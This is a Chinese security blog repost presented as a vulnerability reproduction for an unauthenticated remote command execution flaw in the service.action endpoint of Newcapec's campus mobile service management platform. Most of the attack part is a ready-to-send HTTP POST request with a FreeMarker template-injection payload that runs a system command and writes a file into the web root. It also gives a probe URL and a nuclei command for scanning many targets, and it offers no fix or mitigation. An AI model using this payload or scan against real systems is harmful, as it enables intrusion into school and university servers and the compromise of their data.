【漏洞复现】新开普掌上校园服务管理平台service.action远程命令执行漏洞

admin 2023年11月30日08:31:47评论251 views字数 1104阅读3分40秒阅读模式
【漏洞复现】新开普掌上校园服务管理平台service.action远程命令执行漏洞
产品简介
【漏洞复现】新开普掌上校园服务管理平台service.action远程命令执行漏洞

新开普智慧校园体系基于业务、数据双中台理念,建立共享开放能力平台,实现能力开放和服务与数据的全生命周期治理;基于一云多端,混合云服务模式,覆盖管理、生活、教学、科研和社会化服务全场景,让师生随时随地获得资源和服务;围绕按主题建设,按场景上线,以评促建,可持续发展的路径,渐进建设全业务应用场景,让智慧校园建设更简单。

【漏洞复现】新开普掌上校园服务管理平台service.action远程命令执行漏洞

【漏洞复现】新开普掌上校园服务管理平台service.action远程命令执行漏洞
漏洞介绍
【漏洞复现】新开普掌上校园服务管理平台service.action远程命令执行漏洞

新开普掌上校园服务管理平台service.action接口处存在远程命令执行漏洞,攻击者可在未经身份认证的情况下,调用后台接口,执行恶意系统命令。

【漏洞复现】新开普掌上校园服务管理平台service.action远程命令执行漏洞
漏洞复现
【漏洞复现】新开普掌上校园服务管理平台service.action远程命令执行漏洞

访问地址探测是否存在漏洞

http://x.x.x.x/service_transport/service.action

【漏洞复现】新开普掌上校园服务管理平台service.action远程命令执行漏洞

出现这个页面说明存在漏洞

POC:

POST /service_transport/service.action HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0Connection: closeContent-Length: 211Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4Upgrade-Insecure-Requests: 1

{  "command": "GetFZinfo",  "UnitCode": "<#assign ex = "freemarker.template.utility.Execute"  ?new()>${ex("cmd /c echo 123 >./webapps/ROOT/test.txt")}"}

之后访问漏洞地址

http://x.x.x.x/test.txt

脚本:也可利用nuclei脚本检测

nuclei.exe -t .templatesnucleinewcapec-CampusMobileServiceManagementPlatform-RCE.yaml -l urls.txt

【漏洞复现】新开普掌上校园服务管理平台service.action远程命令执行漏洞

原文始发于微信公众号(扫地僧的茶饭日常):【漏洞复现】新开普掌上校园服务管理平台service.action远程命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月30日08:31:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】新开普掌上校园服务管理平台service.action远程命令执行漏洞http://cn-sec.com/archives/2254476.html

发表评论

匿名网友 填写信息